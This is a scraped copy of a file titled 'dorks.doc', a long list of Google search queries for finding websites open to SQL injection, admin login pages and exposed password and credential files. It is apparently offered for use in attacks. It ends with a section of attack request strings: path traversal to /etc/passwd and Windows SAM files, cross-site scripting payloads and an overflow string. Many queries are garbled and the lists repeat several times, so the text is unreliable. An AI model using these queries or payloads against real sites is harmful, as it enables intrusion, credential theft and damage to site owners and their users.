• No results found

dorks.doc

N/A
N/A
Info
Download
Protected

Academic year: 2021

Share "dorks.doc"

Copied!
378
0
0

Loading.... (view fulltext now)

Download now ( 378 Page )

Full text

(1)

Error_Based_dorks

inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:"id=" & intext:"Warning: mysql_fetch_array() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: is_writable() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: Unknown()

inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: pg_exec() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: mysql_query() inurl:"id=" & intext:"Warning: array_merge() inurl:"id=" & intext:"Warning: preg_match() inurl:"id=" & intext:"Warning: ilesize() inurl:"id=" & intext:"Warning: filesize() inurl:"id=" & intext:"Warning: require()

(2)

SQL_injection_dor

ks

-SQL INJECTION DORKS BY GENERAL DEE-inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurltray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurlreview.php?id= inurl:loadpsb.php?id= inurlpinions.php?id= inurl:spr.php?id= inurlages.php?id= inurl:announce.php?id= inurl:clanek.php4?id=

(3)

inurlarticipant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurlrod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurlerson.php?id= inurlroductinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurlrofile_view.php?id= inurl:category.php?id= inurlublications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurlrod_info.php?id= inurl:shop.php?do=part&id= inurlroductinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurlroduct.php?id= inurl:releases.php?id= inurl:ray.php?id= inurlroduit.php?id= inurlop.php?id= inurl:shopping.php?id= inurlroductdetail.php?id= inurlost.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurlage.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurlroduct_ranges_view.php?ID= inurl:shop_category.php?id= inurl:tran******.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id=

(4)

inurlroduct-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:review.php?id= inurl:loadpsb.php?id= inurl:ages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurlpinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurlffer.php?idf= inurl:art.php?idm= inurl:title.php?id= inur l: info.php?id= inurl : pro.php?id= inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurltray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id=

(5)

inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurlreview.php?id= inurl:loadpsb.php?id= inurlpinions.php?id= inurl:spr.php?id= inurlages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurlarticipant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurlrod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurlerson.php?id= inurlroductinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurlrofile_view.php?id= inurl:category.php?id= inurlublications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurlrod_info.php?id= inurl:shop.php?do=part&id= inurlroductinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurlroduct.php?id= inurl:releases.php?id= inurl:ray.php?id= inurlroduit.php?id=

(6)

inurlop.php?id= inurl:shopping.php?id= inurlroductdetail.php?id= inurlost.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurlage.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurlroduct_ranges_view.php?ID= inurl:shop_category.php?id= inurl:tran******.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:review.php?id= inurl:loadpsb.php?id= inurl:ages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurlpinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurlffer.php?idf= inurl:art.php?idm=

(7)

inurl:title.php?id= inurl:shop+php?id+site:fr "inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp"

inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:"id=" & intext:"Warning: mysql_fetch_array() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: is_writable() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: Unknown()

inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: pg_exec() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: mysql_query() inurl:"id=" & intext:"Warning: array_merge() inurl:"id=" & intext:"Warning: preg_match() inurl:"id=" & intext:"Warning: ilesize() inurl:"id=" & intext:"Warning: filesize() inurl:"id=" & intext:"Warning: require() inurl:index.php?id= inurl:trainers.php?id= inurl:login.asp index of:/admin/login.asp inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id=

(8)

inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:produit.php?id=+site:fr inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?id= inurl:post.php?id=

(9)

inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl:offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category=

(10)

inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurltray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurlreview.php?id= inurl:loadpsb.php?id= inurlpinions.php?id= inurl:spr.php?id= inurlages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurlarticipant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurlrod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurlerson.php?id= inurlroductinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id=

(11)

inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurlrofile_view.php?id= inurl:category.php?id= inurlublications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurlrod_info.php?id= inurl:shop.php?do=part&id= inurlroductinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurlroduct.php?id= inurl:releases.php?id= inurl:ray.php?id= inurlroduit.php?id= inurlop.php?id= inurl:shopping.php?id= inurlroductdetail.php?id= inurlost.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurlage.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurlroduct_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:review.php?id= inurl:loadpsb.php?id= inurl:ages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l=

(12)

inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurlpinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurlffer.php?idf= inurl:art.php?idm= inurl:title.php?id=

(13)

Password DORKS

"admin account info" filetype:log

!Host=*.* intext:enc_UserPassword=* ext:pcf

"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd

"AutoCreate=TRUE password=*" "http://*:*@www" domainname

"index of/" "ws_ftp.ini" "parent directory"

"liveice configuration file" ext:cfg -site:sourceforge.net "parent directory" +proftpdpasswd

"powered by ducalendar" -site:duware.com "Powered by Duclassified" -site:duware.com

"Powered by Duclassified" -site:duware.com "DUware All Rights reserved" "powered by duclassmate" -site:duware.com

"Powered by Dudirectory" -site:duware.com "powered by dudownload" -site:duware.com "Powered By Elite Forum Version *.*" "Powered by Link Department"

"sets mode: +k"

"your password is" filetype:log

"Powered by DUpaypal" -site:duware.com allinurl: admin mdb

auth_user_file.txt config.php

eggdrop filetype:user user

enable password | secret "current configuration" -intext:the etc (index.of)

ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn ext:inc "pwd=" "UID="

ext:ini eudora.ini

ext:ini Version=4.0.0.4 password

ext:passwd -intext:the -sample -example ext:txt inurl:unattend.txt

ext:yml database inurl:config filetype:bak createobject sa

filetype:bak inurl:"htaccess|passwd|shadow|htusers" filetype:cfg mrtg "target[*]" -sample -cvs -example filetype:cfm "cfapplication name" password

filetype:conf oekakibbs filetype:conf slapd.conf

filetype:config config intext:appSettings "User ID" filetype:dat "password.dat"

filetype:dat inurl:Sites.dat filetype:dat wand.dat

(14)

filetype:inc dbconn

filetype:inc intext:mysql_connect

filetype:inc mysql_connect OR mysql_pconnect filetype:inf sysprep filetype:ini inurl:"serv-u.ini" filetype:ini inurl:flashFXP.ini filetype:ini ServUDaemon filetype:ini wcx_ftp filetype:ini ws_ftp pwd filetype:ldb admin

filetype:log "See `ipsec --copyright" filetype:log inurl:"password.log" filetype:mdb inurl:users.mdb filetype:mdb wwforum

filetype:netrc password

filetype:pass pass intext:userid filetype:pem intext:private

filetype:properties inurl:db intext:password filetype:pwd service

filetype:pwl pwl

filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword" filetype:reg reg +intext:”WINVNC3”

filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS filetype:sql "insert into" (pass|passwd|password)

filetype:sql ("values * MD5" | "values * password" | "values * encrypt";) filetype:sql ("passwd values" | "password values" | "pass values" )

filetype:sql +"IDENTIFIED BY" -cvs filetype:sql password

filetype:url +inurl:"ftp://" +inurl:";@" filetypels username password email

htpasswd

htpasswd / htgroup htpasswd / htpasswd.bak intext:"enable password 7"

intext:"enable secret 5 {:content:}quot; intext:"powered by EZGuestbook"

intext:"powered by Web Wiz Journal" intitle:"index of" intext:connect.inc intitle:"index of" intext:globals.inc intitle:"Index of" passwords modified

intitle:"Index of" sc_serv.conf sc_serv content

intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"

intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com

intitle:index.of administrators.pwd intitle:Index.of etc shadow

intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak" intitle:rapidshare intext:login

inurl:"calendarscript/users.txt"

inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"

inurl:"GRC.DAT" intext:"password" inurl:"Sites.dat"+"PASS="

inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample

inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample inurl:"wvdial.conf" intext:"password"

inurl:/db/main.mdb inurl:/wwwboard

(15)

inurl:/yabb/Members/Admin.dat inurl:ccbill filetype:log

inurl:cgi-bin inurl:calendar.cfg inurl:chap-secrets -cvs

inurl:config.php dbuname dbpass inurl:filezilla.xml -cvs

inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man inurl:nuke filetype:sql

inurl:ospfd.conf intext:password -sample -test -tutorial -download inurl:pap-secrets -cvs

inurl:pass.dat

inurl:perform filetype:ini inurl:perform.ini filetype:ini

inurl:secring ext:skr | ext:pgp | ext:bak inurl:server.cfg rcon password

inurl:ventrilo_srv.ini adminpassword inurl:vtund.conf intext:pass -cvs

inurl:zebra.conf intext:password -sample -test -tutorial -download LeapFTP intitle:"index.of./" sites.ini modified

master.passwd

mysql history files

NickServ registration passwords passlist

passlist.txt (a better way) passwd

passwd / etc (reliable) people.lst

psyBNC config files pwd.db

server-dbs "intitle:index of" signin filetype:url

spwd.db / passwd trillian.ini

wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin [WFClient] Password= filetype:ica

(16)

various_19K Dorks

/!Open /!OpenServer /"%20'60716363677F6274',%201,%201,%201,%201,%201,%20'Y',%201," /"%201,%201) /"%20password,%20editactiontime,%20orgstructure,%20createviewtemplate," /"%20publishmacros,%20override_contract%20)%20VALUES%20('Hacked'," /"%20removelogins,%20editlinkedfiles,%20newencrypt,%20showalljobs," /"><img%20src="javascriptt(xss)"> /"><script>alert('XSS')</script> /"><script>alert(097531);</script> /##php /$LOCATION$footers.php? tinybb_footers=../../../../../../../../../../../../etc/passwd /% /%%% /%00 /%00%00.nsf/../lotus/domino/notes.ini /%00%00.nsf/../winnt/win.ini /%00%20.nsf/../lotus/domino/notes.ini /%00%20.nsf/../winnt/win.ini /%00%c0%af.nsf/../lotus/domino/notes.ini /%00%c0%af.nsf/../winnt/win.ini /%00...nsf/../lotus/domino/notes.ini /%00...nsf/../winnt/win.ini /%00.nsf.nsf/../lotus/domino/notes.ini /%00.nsf.nsf/../winnt/win.ini /%00.nsf/../../lotus/domino/notes.ini /%00.nsf/../../winnt/win.ini /%00.nsf/..//lotus/domino/notes.ini /%00.nsf/..//winnt/win.ini /%00.nsf/../lotus/domino/notes.ini /%00.nsf/../winnt/win.ini /%00.nsf//../lotus/domino/notes.ini /%00.nsf//../winnt/win.ini /%00/ /%0a%0a /%0a%0d%0a%0d<script>alert(XSS)</script> /%20 /%20%00.nsf/../lotus/domino/notes.ini /%20%00.nsf/../winnt/win.ini /%20..\%20..\%20..\%20..\%20..\%20..\%20..\boot.ini /%20..\%20..\%20..\%20..\%20..\%20..\%20..\winnt\win.ini /%20.nsf/..//lotus/domino/notes.ini /%20.nsf/..//winnt/win.ini /%20.nsf//../lotus/domino/notes.ini /%20.nsf//../winnt/win.ini /%20.xtp /%22%3cscript%3e /%252e%252e/%252e%252e/%00.jsp

(17)

/%25n /%2bADw-SCRIPT%2bAD4-alert(xss)%2bADw-%2bAC8-SCRIPT%2bAD4-.ida /%2bADw-SCRIPT%2bAD4-alert(xss)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile %3d%2fiisstart.asp%26CiRestriction%3d'' /%2e%2e/%2e%2e/%00.jsp /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E %2E/etc/motd /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E %2E/etc/passwd /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win.ini /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini /%2e%2e/%2e%2e/%2e%2e/scandisk.log /%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log /%2e%2e/%2e%2e/scandisk.log /%2E/ /%2ehtpasswd /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini /%2f..%2f..%2f../ /%2f..%2f..%2f../winnt/repair/sam /%2f..%2f..%2f../ws4d.log.txt /%2F/ /%3c/a%3e%3cscript%3e /%3c/title%3e%3c /%3cscript%3ealert(%22CSS%22)%3c/script%3e/ /%3Cscript%3Ealert('XSS')%3C/script%3E.do /%3Cscript%3Ealert('XSS');%3C/script%3E /%3E%3Cscript%3Ealert(xss)%3C/script%3E /%3f.jsp /%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cboot %2Eini /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini /%5c..%5c..%5c..%5cwindows%5cwin%2eini /%5c..%5c..%5c..%5cwindows%5cwin.ini /%5C/ /%63%67%69%2d%62%69%6e/%74%65%73%74%2d%63%67%69 /%77s_ftp.ini /%7Eadmin/ /%7Ebin/ /%7Eetc/ /%7Eguest/ /%7Ehome/ /%7Elog/ /%7Enobody/ /%7Eroot/ /%7Esbin/ /%7Estats/ /%7Eusr/ /%7Evar/ /%7Ewebstats/ /%7Ewsdocs/ /%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f %80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f

(18)

%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f %80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f %80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f %80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f %80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b %c0%1fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\ xfd\xe7%dc\x80AAAAAAAAAAAAAAAAAAAA%fd%c3%16%58%ff %21%d7%acAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 